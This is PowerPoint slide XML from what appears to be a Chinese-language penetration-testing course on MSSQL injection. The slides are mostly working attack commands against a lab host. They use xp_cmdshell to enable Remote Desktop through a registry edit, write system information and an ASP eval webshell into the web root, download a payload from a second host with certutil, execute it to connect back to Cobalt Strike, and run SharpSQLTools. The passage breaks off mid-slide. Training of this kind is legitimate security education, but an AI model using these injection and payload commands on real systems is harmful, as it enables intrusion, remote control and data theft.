              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'REG ADD HKLM\SYSTEM\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>CurrentControlSet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\Control\Terminal" "Server /v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>fDenyTSConnections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> /t REG_DWORD /d 00000000 /f'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>3389</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>http://192.168.172.140/less-1.asp?id=1';exec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> &gt; c:\inetpub\wwwroot\systeminfo.txt'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>执行命令写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>根目录或反弹</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>http://192.168.172.140/less-1.asp?id=1';exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'echo ^&lt;%eval request("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>")%^&gt; &gt; c:\inetpub\wwwroot\shell.asp'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>执行命令写入</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>操作系统中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>是转义符号，此处利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>^</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>转义原本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>符号</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32324105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2"/>
            <a:ext cx="11035409" cy="28315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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1"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b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扩展利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4257760" y="2751893"/>
            <a:ext cx="7934241" cy="135421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en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>命令上线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>CS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>http://192.168.172.140/less-1.asp?id=1';exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'certutil.exe -f -split -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>urlcache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> http://192.168.172.129:9090/payload64.txt c:\\inetpub\\wwwroot\\payload1.bat'--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>http://192.168.172.140/less-1.asp?id=1';exec master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t> 'c:\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>inetpub</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>wwwroot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>\\payload1.bat'--</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0FC996D-08CB-47D5-8DD2-7617371B4041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1" y="4235368"/>
            <a:ext cx="6028284" cy="2622633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32589752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2"/>
            <a:ext cx="11035409" cy="28315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扩展存储过程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开头，主要使用外部程序语言编写的存储过程。</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直接利用其执行命令， </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xp_subdirs</a:t>
            </a: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读取文件夹内的文件夹列表等</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b="1"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b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>扩展利用</a:t>
            </a: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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27D6C5DD-85E5-45F5-ACB4-9F24B45E110F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2701755" y="3345886"/>
            <a:ext cx="6788488" cy="8617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en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SharpSQLTools</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
              <a:sym typeface="Calibri" panose="020F0502020204030204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr defTabSz="1219170" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Calibri" panose="020F0502020204030204"/>
              </a:rPr>
              <a:t>SharpSQLTools.exe 192.168.172.140 </a:t>
            </a:r>
            <a:r>
